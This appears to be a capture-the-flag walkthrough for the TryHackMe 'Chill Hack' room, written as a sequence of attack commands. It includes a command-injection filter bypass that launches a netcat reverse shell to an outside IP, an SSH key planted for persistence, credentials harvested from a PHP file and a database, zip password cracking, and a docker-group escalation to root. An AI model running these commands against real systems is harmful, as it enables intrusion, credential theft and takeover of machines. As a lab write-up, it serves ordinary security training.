Room Link: https://tryhackme.com/room/chillhack
Initial Scan
Kali
Scan all ports
No other ports found.
Kali
Copy nmap -sV -sT -O -p 1-65535 $VICTIM TCP/80 - HTTP
Kali
Copy gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
A lot of commands ran will result in this page.
Command Injection
Used this to find a way to bypass the filter. by adding a \ in the middle of the first command, it treats the command as a new line so it allows us to run any command we want.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Web
Copy r\m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.172.186 1337 >/tmp/f Kali
Victim
Copy python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Victim
Copy sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
/bin/bash Victim(apaar)
Copy python3 -c 'import pty; pty.spawn("/bin/bash")' Victim(apaar)
Copy netstat -at
curl localhost:9001 Pivot
Kali
Copy ssh-keygen -t rsa
cat /root/.ssh/id_rsa.pub Victim
Copy copy id_rsa.pub to /home/apaar/.ssh/authorized_keys Kali
Copy vi /etc/proxychains.conf proxychains.conf
Copy socks4 127.0.0.1 9050 Kali
Copy ssh -D 9050 apaar@VICTIM
I can now see the webpage from Kali but no login credentials to use.
Found credentials for mysql in one of the php files.
Victim(apaar)
Copy cat /var/www/files/index.php Victim(apaar)
Copy mysql -u root -p webportal
Password: !@m+her00+@db Victim(mysql)
Copy SHOW DATABASES;
use webportal;
SHOW TABLES;
select * from users;
Both set of credentials work on the login page, both bring up this page.
Used no password
Kali
Copy steghide extract -sf hacker-with-laptop_23-2147985341.jpg Cracking Password Protected Zip Files
Kali
Copy zip2john backup.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt Kali
Copy unzip backup.zip
Password: pass1word Kali
Copy cat source_code.php
echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d Victim(apaar)
Copy su anurodh
Password: !d0ntKn0wmYp@ssw0rd Privilege Escalation
anurodh is apart of a docker group which the other user was not apart of, looking at gtfo bins theres a way to get a shell so I tried it and got root
Link: https://gtfobins.github.io/gtfobins/docker/#shell
Victim(anurodh)
Copy groups
docker run -v /:/mnt --rm -it alpine chroot /mnt sh 
